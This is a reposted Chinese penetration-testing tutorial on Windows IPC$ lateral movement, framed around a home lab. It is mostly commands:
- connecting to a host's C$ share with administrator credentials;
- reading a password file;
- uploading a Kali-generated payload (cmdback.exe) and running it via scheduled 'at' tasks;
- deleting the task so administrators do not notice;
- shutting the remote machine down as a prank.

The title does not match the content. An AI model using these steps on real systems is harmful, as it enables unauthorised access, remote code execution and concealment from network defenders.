c++使用netsh命令_渗透常用命令IPC$内网(一)
生活随笔
收集整理的這篇文章主要介紹了
c++使用netsh命令_渗透常用命令IPC$内网(一)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
?? 一、IPC$命令
????IPC$命令在內網滲透測試中還是經常使用的,也是一款不錯的命令。說白了就是一個共享命名管道的資源,它是為了讓進城間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,從而在本機進行遠程管理目標主機和查看目標主機的共享資源。
?? ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的。
本地搭建環境:1、WIN7 虛機2、WIN10 物理機3、kaili既然是內網滲透來執行此命令,首先要通過腳本或者工具探測內網中存在IPC$的主機。如下圖所示:1、通過net use 建立一個非空連接net?use?\\192.168.19.151\c$?"qwerty@12345678"?/user:"administrator"參數詳解:net?use?\\主機IP地址\c$ "密碼" /user:"用戶名"列舉C盤中的文件,并查看敏感文件:dir \\192.168.19.151\c$type?\\192.168.19.151\c$\pass.txt通過IPC$命令上傳本地的shellcode,并進行執行首先在kali上面生成一個payload,然后下載在本地,使用copy命令將payload上傳到目標服務器,然后再用at命令查看遠程主機時間,最后設置payload運行時間。copy?C:\Users\ASUS\Downloads\cmdback.exe?\\192.168.19.151\c$查看遠程主機的當前運行時間,然后用使用at命令來設置payload運行的時間,但是win7上面不能使用at命令,已被移除。但是命令還是可以執行的。net?time?\\192.168.19.151 查看遠程主機的當前時間at?\\192.168.19.151?10:50:00?c:\cmdback.exe?設置payload在目標主機運行的時間執行完畢后,還需要將該計劃任務刪除,以免被網管理員發現。at?\\192.168.19.151?5?/delete5??指的是當前執行計劃任務的ID號執行系統命令,但是執行的結果不會打印在當前的dos命令框中,還需用type來進行查看at \\192.168.19.151 11:25:00 cmd.exe /c "ipconfig >> c:\ip.txt"type?\\192.168.19.151\c$\ip.txtat?\\主機IP地址?執行命令的時間?cmd.exe?/c?"執行的系統命令?>> 重定向某個自定義的文件夾中"將遠程主機的C盤映射到本地的Z盤:net use z: \\192.168.19.151\c$查看建立的會話:net use刪除會話:net use \\192.168.19.151 /delete惡搞遠程主機進行關機:at??\\192.168.19.151?cmd.exe /c "shudown -s"總結
以上是生活随笔為你收集整理的c++使用netsh命令_渗透常用命令IPC$内网(一)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 谷歌拼音输入法怎么用双拼
- 下一篇: centos7python命令_Cent